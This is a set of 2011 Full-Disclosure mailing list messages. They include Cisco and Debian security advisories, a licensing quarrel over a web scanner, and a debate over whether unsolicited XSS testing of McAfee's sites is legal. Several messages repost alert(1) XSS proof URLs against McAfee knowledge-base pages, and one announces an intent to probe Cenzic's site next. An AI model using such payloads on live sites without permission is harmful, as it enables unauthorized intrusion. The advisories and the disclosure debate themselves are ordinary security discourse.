 http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
 Former Disclosure, 2009:

 http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks
 -110667.shtml
 Former Disclosure, 2010:

 http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-de
 facement.html
 host-extract: http://code.google.com/p/host-extract/
 Demo:
 http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
 xssed: http://www.xssed.com/search?key=mcafee.com
 Lessont Learn:
 

Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread Steven Pinkham
runlvl wrote:
  The INSECT Pro version hosted on that site is really old, from what I
  see is the version 1.1 and is not an official version, on the other
  side.

The version made available is older (2.0 version, not 1.1 as you claim), 
but it is an official version, or at least what you gave me as an 
official download.  There is also a recompressed version with the same 
content for a smaller download size for people that want that.
As I said before, I'll happily update the version hosted there to the 
newest version if you allow it.  My download password stopped working at 
the time of the next release, and emails about it have been ignored.

  INSECT Pro 2.5 is free and we only ask for a donation to show
  interest. The amount of the donation is not fixed.

Please, let's not start this up again.  Your page clearly says you are 
buying a license, and has removed all comments about it being free.  The 
licenses of the software you include (Metasploit and Skipfish) allow 
this, and there's no benefit to you making the claim of the software 
being free.  You may or may not offer some licenses gratis, but that's 
different from the software being free in the sense that most people 
understand.  If it's free, I'll happily host newer versions for free 
download for everyone.  Otherwise, stick with the license language you 
have on your website.

To be clear, I have no problem with you offering licenses for sale, 
offering licenses for donations, or making software freely available. 
Just do the one you are claiming to do please.
-- 
  | Steven Pinkham, Security Consultant|
  | http://www.mavensecurity.com   |
  | GPG public key ID CD31CAFB |


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread Chris M
Maybe you can fix my login/password for insecurityresearch.com as per my
earlier mail.

Customer Service  Marketing, right? :p

On Wed, Mar 30, 2011 at 3:44 PM, runlvl run...@gmail.com wrote:

 The INSECT Pro version hosted on that site is really old, from what I
 see is the version 1.1 and is not an official version, on the other
 side. INSECT Pro 2.5 is free and we only ask for a donation to show
 interest. The amount of the donation is not fixed.

 We want to say thanks to the community that allows us to further
 develop and thank to you we can afford a decent hosting so you can
 download updates directly from our site.

 Just as there are trolls on this list going around and insulting
 everyone, too many people are worthwhile and that is why we continue
 learning and developing for this project.

 Greetings!
 Juan Sacco

  --
 _
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.5 was released stay tunned

 2011/3/30 Quentin Ducas quentin@gmail.com:
  It is still available at http://insectpro.highprofilesite.com/
  Free, no donation required.
 
  Quentin
 
 
  2011/3/30 runlvl run...@gmail.com:
  Insecurity Research is happy to announce the release of version 2.5,
  get it now while is still hot !
 
  Insect Pro 2.5 is a penetration security auditing and testing software
  solution designed to allow organizations of all sizes mitigate,
  monitor and manage the latest security threats vulnerabilities.
 
  We’re always working to improve Insect Pro and now the users obtain
  a new feature: A fully automated active web application security
  reconnaissance tool.
 
  Check it out: http://www.youtube.com/watch?v=ifiyHem7fMA
 
  We invite you to take a visual tour where you can find screenshots and
  videos, visit us now at http://www.insecurityresearch.com
 
  There is no fixed price to get a copy, you can obtain the full version
  by making a minimum donation to keep us coding.
 
  We are really thankful with the community!
 
  Get it now from: http://www.insecurityresearch.com
 
  Juan Sacco
 
  --
  _
  Insecurity Research - Security auditing and testing software
  Web: http://www.insecurityresearch.com
  Insect Pro 2.5 was released stay tunned
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/
 

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




-- 
 I’m a hot-wired, heat seeking, warm-hearted cool customer, voice activated
and bio-degradable. I interface with my database, my database is in
cyberspace, so I’m interactive, I’m hyperactive and from time to time I’m
radioactive.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Cisco Security Advisory: Cisco Network Access Control Guest Server System Software Authentication Bypass Vulnerability

2011-03-30 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Cisco Security Advisory: Cisco Network Access Control Guest Server
System Software Authentication Bypass Vulnerability

Advisory ID: cisco-sa-20110330-nac

Revison 1.0

For Public Release 2011 March 30 1600 UTC (GMT)
+-

Summary
===

Cisco Network Access Control (NAC) Guest Server system software
contains a vulnerability in the RADIUS authentication software that
may allow an unauthenticated user to access the protected network.

Cisco has released free software updates that address this
vulnerability.

This advisory is posted at:
http://www.cisco.com/warp/public/707/cisco-sa-20110330-nac.shtml

Affected Products
=

Cisco NAC Guest Server provides guest policy enforcement to Cisco NAC
appliances and Cisco Wireless LAN Controllers, where guest policies
are enforced.

Vulnerable Products
+--

This vulnerability affects all versions of NAC Guest Server software
prior to software version 2.0.3. The software version is displayed on
the login page of the web server.

Products Confirmed Not Vulnerable
+

No other Cisco products are currently known to be affected by this
vulnerability.

Details
===

The Cisco NAC Guest Server system software contains a vulnerability
in the configuration file of the RADIUS authentication software. This
misconfiguration may allow an unauthenticated user to access the
protected network. This vulnerability may result in authentication
bypass without requiring a valid username or password.

This vulnerability is documented in Cisco Bug ID CSCtj66922 (
registered customers only) and has been assigned Common
Vulnerabilities and Exposures (CVE) ID CVE-2011-0963.

Vulnerability Scoring Details
+

Cisco has provided scores for the vulnerability in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at:

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss

* CSCtj66922 -  Authentication Bypass Vulnerability

CVSS Base Score - 5.0
Access Vector -Network
Access Complexity -Low
Authentication -   None
Confidentiality Impact -   Partial
Integrity Impact - None
Availability Impact -  None

CVSS Temporal Score - 4.1
Exploitability -   Functional
Remediation Level -Official-Fix
Report Confidence -Confirmed

Impact
==

Successful exploitation of the vulnerability may allow unauthorized
users to access the protected network.

Software Versions and Fixes
===

When considering software upgrades, also consult 
http://www.cisco.com/go/psirt and any subsequent advisories to determine 
exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

Software versions prior to 2.0.3 are affected by this vulnerability.
Fixed software and workarounds are available for all NAC Guest Server
devices.

Workarounds
===

It is possible to modify the RADIUS configuration file of the Cisco
NAC Guest Access Server to eliminate thepotential for authentication
bypass. The following commands modify the RADIUS configuration line
file and restart the RADIUS daemon to read the new configuration
file.

The configuration file may be modified by running the following
command from the command-line interface (CLI) of the device:

# cp /etc/raddb/radiusd.conf /etc/raddb/radiusd.conf.orig
# sed -i 's/php -f/php/g' /etc/raddb/radiusd.conf
# service radiusd restart

Obtaining Fixed Software


Cisco has released free software updates that address this
vulnerability. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets
they have purchased. By installing

[Full-disclosure] Cisco Security Advisory: Cisco Secure Access Control System Unauthorized Password Change Vulnerability

2011-03-30 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Cisco Security Advisory: Cisco Secure Access Control System Unauthorized
Password Change Vulnerability

Advisory ID: cisco-sa-20110330-acs

Revision 1.0

For Public Release 2011 March 30 1600 UTC (GMT)

+-

Summary
===

A vulnerability exists in some Cisco Secure Access Control System
(ACS) versions that could allow a remote, unauthenticated attacker to
change the password of any user account to any value without
providing the account's previous password. Successful exploitation
requires the user account to be defined on the internal identity
store.

This vulnerability does not allow an attacker to perform any other
changes to the ACS database. That is, an attacker cannot change
access policies, device properties, or any account attributes except
the user password.

Cisco has released free software updates that address this
vulnerability. There is no workaround for this vulnerability.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20110330-acs.shtml.

Affected Products
=

Vulnerable Products
+--

The following Cisco Secure ACS versions are affected by this
vulnerability:

  * Cisco Secure ACS version 5.1 with patch 3, 4, or 5 (or any
combination of these patches) installed and without patch 6 or
later installed
  * Cisco Secure ACS version 5.2 without any patches installed
  * Cisco Secure ACS version 5.2 with patch 1 or 2 (or both of these
patches) installed and without patch 3 or later installed

The previous list applies to both the hardware appliance and the
software-only versions of the product.

The following methods can be used to determine which version of the
Cisco Secure ACS is installed:

  * From the Cisco Secure ACS command-line interface (CLI), issue the
show version command, as shown in the following example:

acs51a/admin# show version

Cisco Application Deployment Engine OS Release: 1.2
ADE-OS Build Version: 1.2.0.152
ADE-OS System Architecture: i386

Copyright (c) 2005-2009 by Cisco Systems, Inc.
All rights reserved.
Hostname: acs51a


Version information of installed applications
-


Cisco ACS VERSION INFORMATION
-
Version : 5.1.0.44.6
Internal Build ID : B.2347
Patches :
5-1-0-44-3
5-1-0-44-6

acs51a/admin#

  * On the main login page of the Cisco Secure ACS web-based
interface, the version information is displayed on the left side
of the screen.
  * From the Cisco Secure ACS web-based interface, log in and click
the About link at the top right corner of the screen.

Cisco Secure ACS version 5.1 will identify itself as version 5.1.0.44,
whereas Cisco Secure ACS version 5.2 will identify itself as version
5.2.0.26. The presence of an additional digit after the version number
indicates the highest patch level installed. For example, a version
number of 5.1.0.44.3 indicates Cisco Secure ACS version 5.1 with up to
patch 3 installed. The absence of any additional digit after the version
string indicates a Cisco Secure ACS version with no patches installed.

Products Confirmed Not Vulnerable
+

The following Cisco Secure ACS versions are not affected by this
vulnerability:

  * Any Cisco Secure ACS version prior to version 5.1
  * Cisco Secure ACS version 5.1 without any patches installed, or
with patch 6 or later installed
  * Cisco Secure ACS version 5.1 with patch 1 or 2 (or both of these
patches) installed
  * Cisco Secure ACS version 5.1 with patch 3, 4, or 5 (or any
combination of these patches) installed, as long as patch 6 or
later is also installed
  * Cisco Secure ACS version 5.2 with patch 1 or 2 (or both of these
patches) installed, as long as patch 3 or later is also installed
  * Cisco Secure ACS version 5.2 with patch 3 or later installed

The previous list applies to both the hardware appliance and the
software-only versions of the product.

No other Cisco products are currently known to be affected by this
vulnerability.

Details
===

Cisco Secure ACS operates as a centralized RADIUS and TACACS+ server,
combining user authentication, user and administrator device access
control, and policy control into a centralized identity networking
solution.

A vulnerability exists in some Cisco Secure ACS versions that could
allow a remote, unauthenticated attacker to change the password of
any user account to any value without providing the account's
previous password. Successful exploitation requires the user account
to be defined on the internal identity store.

This vulnerability cannot be used to change the password for the
following types of users accounts:

  * User accounts that are defined on external identity

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Jeffrey Walton
On Wed, Mar 30, 2011 at 8:44 AM, YGN Ethical Hacker Group
li...@yehg.net wrote:
 According to xssed.com,  there are two remaining XSS issues:

 https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); //
 https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //


 You guys know our disclosed issues are very simple and can easily be
 found through viewing HTML/JS source codes and simple Google Hacking
 (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).

 However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
 http://www.cenzic.com/company/management/khera/,  according to Network
 World News editor - Ellen Messmer.  Thus, the next target is Cenzic
 web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
 is.
Too funny I wonder is Aaron Barr is consulting for Cenzic.

Jeff

 [SNIP]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Ryan Sears
Seriously. I gotta say I feel like people at Cenzic (and Mcafee for that 
matter), if anyone should understand that a XSS should really only be construed 
a 'criminal act' if it's indeed used to attack someone. If a group is taking 
the time out of their day to find and disclose issues to Mcafee, they should 
probably be thankful. What about finding a vulnerability in Mcafee's virus 
scanner? Could that be construed as a 'criminal act' if they disclose it? Where 
do you draw the line?

Basically this sort of thing pushes the community into silence until something 
truly criminal happens. I'm not saying give anyone massive amounts of credit 
for publishing a few XSS bugs (because there's millions of them out there), but 
don't label them as a criminal for trying to help. That's just idiotic IMO.

If you run an enterprise level solution for antivirus AND web vulnerability 
testing, the community understands that it's a process not unlike any other. 
There will be bugs, but it only demolishes the image of Mcafee to see them 
handle it like this in particular. If they would have been appreciative about 
it, and promptly fixed their website (or at the very least maintained friendly 
contact) this incident would have pretty much gone un-noticed.

Look at LastPass as an example. 

http://blog.lastpass.com/2011/02/cross-site-scripting-vulnerability.html

They had someone poking at their site, who managed to find a XSS bug using CRLF 
injections. They were appreciative of the find, 2.5 hrs later the issue was 
fixed, and there was that blog post about exactly what they were going to do 
about it. They took full responsibility for the fact that THEIR coding was to 
blame, and basically said 'This is what happened, and this is why it will 
probably never happen again'. This spoke hugely to me (as I'm sure it did the 
rest of the community) because it shows a company that's willing to admit it 
made a mistake, as opposed to sitting on their haunches and blaming people for 
looking for these sorts of bugs. Oh and not every customer of their service has 
to pay massive licensing fees, as there's a free version as well. In my mind at 
least this equates to a company that cares more about their customers that 
don't pay a single dime, then a company who forces people to pay massive 
amounts of coin for shaky automated scanning and services. That's just the way 
I see it though. 

Someone's gotta tell the emperor he has no clothes on.

Ryan

- Original Message -
From: Jeffrey Walton noloa...@gmail.com
To: YGN Ethical Hacker Group li...@yehg.net
Cc: full-disclosure full-disclosure@lists.grok.org.uk
Sent: Wednesday, March 30, 2011 1:05:42 PM GMT -05:00 US/Canada Eastern
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

On Wed, Mar 30, 2011 at 8:44 AM, YGN Ethical Hacker Group
li...@yehg.net wrote:
 According to xssed.com,  there are two remaining XSS issues:

 https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); //
 https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //


 You guys know our disclosed issues are very simple and can easily be
 found through viewing HTML/JS source codes and simple Google Hacking
 (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).

 However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
 http://www.cenzic.com/company/management/khera/,  according to Network
 World News editor - Ellen Messmer.  Thus, the next target is Cenzic
 web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
 is.
Too funny I wonder is Aaron Barr is consulting for Cenzic.

Jeff

 [SNIP]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Thor (Hammer of God)
Well, I think there is a flip side to this, and that is the fact that no one is 
asking these people to inspect their sites for vulnerabilities.   They are 
taking it upon themselves to scan the sites actively looking for 
vulnerabilities for the sole purpose of exposing them.  They may say that they 
are doing it to ensure that the vendors fix their problems but it's not 
really any of their business to do so.

I think someone would be hard pressed to justify (defend) their actions when 
they basically attack a site that they don't own, without permission, with 
the express intent of finding a vulnerability.  That's the difference between a 
test and an attack.   It doesn't matter how trivial their finds are, or 
what the outcome of the scan is, it is the fact that no one asked, nor wants 
them to do this.  

Technically, what they are doing is in fact illegal - in the US anyway.   So 
there is another aspect of this that deserves some discussion, I think.

t


-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-
boun...@lists.grok.org.uk] On Behalf Of Ryan Sears
Sent: Wednesday, March 30, 2011 10:45 AM
To: noloa...@gmail.com
Cc: full-disclosure
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

Seriously. I gotta say I feel like people at Cenzic (and Mcafee for that 
matter),
if anyone should understand that a XSS should really only be construed a
'criminal act' if it's indeed used to attack someone. If a group is taking the 
time
out of their day to find and disclose issues to Mcafee, they should probably be
thankful. What about finding a vulnerability in Mcafee's virus scanner? Could
that be construed as a 'criminal act' if they disclose it? Where do you draw 
the
line?

Basically this sort of thing pushes the community into silence until something
truly criminal happens. I'm not saying give anyone massive amounts of credit
for publishing a few XSS bugs (because there's millions of them out there),
but don't label them as a criminal for trying to help. That's just idiotic IMO.

If you run an enterprise level solution for antivirus AND web vulnerability
testing, the community understands that it's a process not unlike any other.
There will be bugs, but it only demolishes the image of Mcafee to see them
handle it like this in particular. If they would have been appreciative about 
it,
and promptly fixed their website (or at the very least maintained friendly
contact) this incident would have pretty much gone un-noticed.

Look at LastPass as an example.

http://blog.lastpass.com/2011/02/cross-site-scripting-vulnerability.html

They had someone poking at their site, who managed to find a XSS bug using
CRLF injections. They were appreciative of the find, 2.5 hrs later the issue 
was
fixed, and there was that blog post about exactly what they were going to do
about it. They took full responsibility for the fact that THEIR coding was to
blame, and basically said 'This is what happened, and this is why it will
probably never happen again'. This spoke hugely to me (as I'm sure it did the
rest of the community) because it shows a company that's willing to admit it
made a mistake, as opposed to sitting on their haunches and blaming people
for looking for these sorts of bugs. Oh and not every customer of their service
has to pay massive licensing fees, as there's a free version as well. In my 
mind
at least this equates to a company that cares more about their customers that
don't pay a single dime, then a company who forces people to pay massive
amounts of coin for shaky automated scanning and services. That's just the
way I see it though.


Someone's gotta tell the emperor he has no clothes on.

Ryan

- Original Message -
From: Jeffrey Walton noloa...@gmail.com
To: YGN Ethical Hacker Group li...@yehg.net
Cc: full-disclosure full-disclosure@lists.grok.org.uk
Sent: Wednesday, March 30, 2011 1:05:42 PM GMT -05:00 US/Canada Eastern
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

On Wed, Mar 30, 2011 at 8:44 AM, YGN Ethical Hacker Group li...@yehg.net
wrote:
 According to xssed.com,  there are two remaining XSS issues:

 https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); //
 https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //


 You guys know our disclosed issues are very simple and can easily be
 found through viewing HTML/JS source codes and simple Google Hacking

(http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.m
cafee.com).

 However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
 http://www.cenzic.com/company/management/khera/,  according to
Network
 World News editor - Ellen Messmer.  Thus, the next target is Cenzic
 web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
 is.
Too funny I wonder is Aaron Barr is consulting for Cenzic.

Jeff

 [SNIP]

___
Full-Disclosure - We believe in it.
Charter: 

Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread runlvl
Steve, thanks to the community support we are able to afford a hosting
for insect pro with unlimited bandwith. Now located in USA which
allows higher transfer rates.

We apologize if you got the wrong picture, but right now we don't need
unofficial hosting... I don't care if you want to share it with
whoever you want. I do appreciate your offer but we are going to pass
this time. We have official releases almost every weeks.

The latest version is on our own site and we started to share every
new version with all our supporters, thus there is no need to include
mirrors so far. If something comes up I'll let you know.

I'm sending you the latest version of Insect Pro 2.5 to your personal
email in a couple of minutes.

If you have any questions, comments, or concerns, feel free to email
me at jsa...@insecurityresearch.com

Juan Sacco

2011/3/30 Steven Pinkham steve.pink...@gmail.com:
 runlvl wrote:
 The INSECT Pro version hosted on that site is really old, from what I
 see is the version 1.1 and is not an official version, on the other
 side.

 The version made available is older (2.0 version, not 1.1 as you claim), but
 it is an official version, or at least what you gave me as an official
 download.  There is also a recompressed version with the same content for a
 smaller download size for people that want that.
 As I said before, I'll happily update the version hosted there to the newest
 version if you allow it.  My download password stopped working at the time
 of the next release, and emails about it have been ignored.

 INSECT Pro 2.5 is free and we only ask for a donation to show
 interest. The amount of the donation is not fixed.

 Please, let's not start this up again.  Your page clearly says you are
 buying a license, and has removed all comments about it being free.  The
 licenses of the software you include (Metasploit and Skipfish) allow this,
 and there's no benefit to you making the claim of the software being free.
  You may or may not offer some licenses gratis, but that's different from
 the software being free in the sense that most people understand.  If it's
 free, I'll happily host newer versions for free download for everyone.
  Otherwise, stick with the license language you have on your website.

 To be clear, I have no problem with you offering licenses for sale, offering
 licenses for donations, or making software freely available. Just do the one
 you are claiming to do please.
 --
  | Steven Pinkham, Security Consultant    |
  | http://www.mavensecurity.com           |
  | GPG public key ID CD31CAFB             |




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread jabea
Quoting runlvl run...@gmail.com:

 Steve, thanks to the community support we are able to afford a hosting
 for insect pro with unlimited bandwith. Now located in USA which
 allows higher transfer rates.

 We apologize if you got the wrong picture, but right now we don't need
 unofficial hosting... I don't care if you want to share it with
 whoever you want. I do appreciate your offer but we are going to pass
 this time. We have official releases almost every weeks.


Thats funny, you seemed to be happy when he offered the mirror when he  
did in the past.


Quoting Benji m...@b3nji.com
 The amount of the donation is not fixed.
 Can I make a 0 euro donation?


I love that quote !, as the tool is supposed to be free, but with a  
forced donation. Honnestly, using FD to advertising a tool that is not  
free should not be autorized.



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Launched New Tool - RAR Password Unlocker

2011-03-30 Thread Nagareshwar Talekar
Hey Guys,

That's interesting reversing work and we appreciate your comments on the same.

This tool is from one of our contributing author, Neeraj
(appnimi.com). He is new into this tool development and protocols
where we acknowledge other's contribution in our work.

I have now talked to author and he will be introducing ACK section for
the same. Soon we will update on our pages too.

Generally we give complete credit to other's work however small it may be !

Thank you !

With Regards
Nagareshwar Talekar

http://SecurityXploded.com
http://PasswordForensics.com/
http://NetCertScanner.com
http://twitter.com/securityxploded



On Wed, Mar 30, 2011 at 8:29 PM, Tim tim-secur...@sentinelchicken.org wrote:
  why do we need installer then? distribute that tool as single
  executable.

 Because without the installer, it can't try to monetize the install by 
 installing search toolbars! (It's nice enough to continue the install if you 
 reject their terms, though.)


 On 2011-03-29, at 13:13, Jo Galara wrote:
  How does it work? Bruteforce?

 Yes, but... well, JAD does a better job of explaining than I possibly could:

       Runtime rt = Runtime.getRuntime();
 
       String str = 7z.exe x ;
       str = str + \ + _filepath + \ ;
       str = str + -p\ + pwd + \ ;
       str = str + -o\ + _destpath + \;
       str = str +  -y;
 
       System.out.println(str);
 
       Process p = rt.exec(str);
       p.waitFor();
 
       if (p.exitValue() == 0)
       {
         ret = true;
       }


 That's funny (i.e. pathetic).

 A quick search of the tool's website doesn't reveal any links to the
 7-zip website.  I'm not going to bother to download this tool, since a
 1-line shell script would accomplish the same thing, but if 7-zip
 isn't linked to in the accompanying documentation, then that would be
 a violation of the LGPL.  From 7-zip's FAQ:

  Can I use the EXE or DLL files from 7-Zip in a Commercial Application?

  Yes, but you are required to specify in your documentation (1) that
  you used parts of the 7-Zip program, (2) that 7-Zip is licensed under
  the GNU LGPL license and (3) you must give a link to www.7-zip.org,
  where the source code can be found.


 tim

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




--

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 2208-1] bind9 security update

2011-03-30 Thread Florian Weimer
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2208-1   secur...@debian.org
http://www.debian.org/security/Florian Weimer
March 30, 2011 http://www.debian.org/security/faq
- -

Package: bind9
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-0414

It was discovered that BIND, a DNS server, contains a race condition
when processing zones updates in an authoritative server, either
through dynamic DNS updates or incremental zone transfer (IXFR).  Such
an update while processing a query could result in deadlock and denial
of service.  (CVE-2011-0414)

In addition, this security update addresses a defect related to the
processing of new DNSSEC DS records by the caching resolver, which may
lead to name resolution failures in the delegated zone.  If DNSSEC
validation is enabled, this issue can make domains ending in .COM
unavailable when the DS record for .COM is added to the DNS root zone
on March 31st, 2011.  An unpatched server which is affected by this
issue can be restarted, thus re-enabling resolution of .COM domains.
This workaround applies to the version in oldstable, too.

Configurations not using DNSSEC validations are not affected by this
second issue.

For the oldstable distribution (lenny), the DS record issue will be
fixed soon.  (CVE-2011-0414 does not affect the lenny version.)

For the stable distribution (squeeze), this problem has been fixed in
version 1:9.7.3.dfsg-1~squeeze1.

For the testing distribution (wheezy) and the unstable distribution
(sid), this problem has been fixed in version 1:9.7.3.dfsg-1.

We recommend that you upgrade your bind9 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJNk4LQAAoJEL97/wQC1SS+wH8IAJk6iM470E3CdS+R1lmEPL13
y1+wsx8O2kf9UreLOfSnGnP0TZTHaq5AIPU+To2ct5y9CP6QEamtsVv3zMGZhPER
nUzfTYY/uf8/zCnlm8yFb8e1xozwwtqOJ9ybqnD8AD8FHQHW7HckPPzBwnCQWk3p
R42MwM8n7iMJHZfgNI902/yE6GLRe12BZFAF91DXw6WBFZbh7AAwCAxNz2ZAbvmV
IgICrlAoVpnh1FJJN4HyAAzoTUi4AV3fHuirK356jbuSGxmdYQPCsMusUifNStf/
M2NGeDaaWMzk9Uc/+2RjviEjimeLP+UwWVaIHtMVCuCS3lXELm/fG+7rJcvQJXk=
=vq+V
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Ryan Sears

How about the scenario in which one statically audit's some javascript sitting 
on a site, to notice it does something in an unsafe manner, and can be used in 
a XSS attack without actually making it happen?. There was no actual 
'attacking' done, but there was still a vulnerability discovered. Is THAT 
considered an illegal act? Is putting a '3' into a web form/comment section 
considered attacking it if you look at the source to see how the character 
translated? What if you just wanted to make an ascii heart? My point is it's a 
very blurry line, and there are a lot of scenarios where one may discover a 
vulnerability without even having to do anything.

As for the source code disclosures, there was absolutely no 'attacking' done. 
This was a huge oversight in the site devs, and they were giving that 
information to anyone who requested it, plain and simple. What about the Tumblr 
incident that happened a while ago? Just because they screwed up a production 
script, they ended up leaking massive amounts of internal infrastructure 
details, as well as private API keys, and other stuff that could be used for 
nefarious means. Is it illegal to visit that page? I think not, as THEY were 
putting the information out there (albeit by accident), but I as a user have no 
way to know that. 

I understand what you're saying about them not asking people to look for bugs, 
but it IS the internet. Companies don't typically ask external people to audit 
their executables either, but people do it for a number of reasons (mainly 
education). 

If they leave their site up, people will potentially poke at it. That's just 
the way it is. If I have a vested interest in a company (be it monetary or 
simply supporting it's cause), I personally want to see the site flourish, 
because I am then a part of that site. I want to make sure that my personal 
information is protected, and if I do find a bug somewhere, I report it. I 
recently found a XSS in OpenDNS's landing page, and they were very 
appreciative, very professional, and prompt to respond. This made me WANT to 
work with them further to ensure that their infrastructure was hardened to 
other forms of attack as well. I don't disclose these sorts of issues publicly, 
because I give the developers a chance to fix it, and in my past experience 
most companies are happy that I reported an issue, because I could have just as 
easily not said anything. If it does come down to it though, I follow my own 
public disclosure policy (http://talesofacoldadmin.com/disclosure.html) based 
off Rain Forest Puppy's. It basically just asks for somewhat consistent lines 
of communication after I disclose something. If the communication drops (or is 
non-existent), then it's at my own discretion to disclose it in a public forum. 

I don't HAVE to disclose anything to anyone, I CHOOSE to disclose it, but if 
choosing to disclose something (even in private) means potential legal 
troubles, then that takes away the motivation for me to disclose it in any 
form. I'm still going to be finding bugs for my own educational purposes, but 
I'll just stop disclosing them. That in itself starts to undermine the internet 
as a whole, leading to the restriction of information exchange, which is 
appalling. 

It IS technically illegal to do these sorts of tests without consent, but at 
what point DOES it become a 'test'? There's some cases, granted, in which the 
intention is clear (testing for blind SQL injections, etc) as they leave a huge 
footprint, but there's no explicitly clear line in which it becomes illegal. Is 
adding a ' to my name illegal? What if my 70+ year old grandmother did it by 
accident? Could she be persecuted as well? You can't apply the law to only some 
situations and not others. 

I also point you to one of my favorite XKCD's = http://xkcd.com/327/

Is naming your kid something like that technically illegal? Then that starts 
getting into free-speech issues, which are most certainly protected by the 
constitution. If I want my name to be Ann !@#$%^*() Hero, and the site 
doesn't explicitly tell me I can't do so, then how can I be expected to 
reasonably know where their boundaries are? I don't see any terms of use for 
using their website anywhere. 

This is all just my opinion though, and sorry for the long message!

Ryan

- Original Message -
From: Thor (Hammer of God) t...@hammerofgod.com
To: Ryan Sears rdse...@mtu.edu, noloa...@gmail.com
Cc: full-disclosure full-disclosure@lists.grok.org.uk
Sent: Wednesday, March 30, 2011 2:12:37 PM GMT -05:00 US/Canada Eastern
Subject: RE: [Full-disclosure] Vulnerabilities in *McAfee.com

Well, I think there is a flip side to this, and that is the fact that no one is 
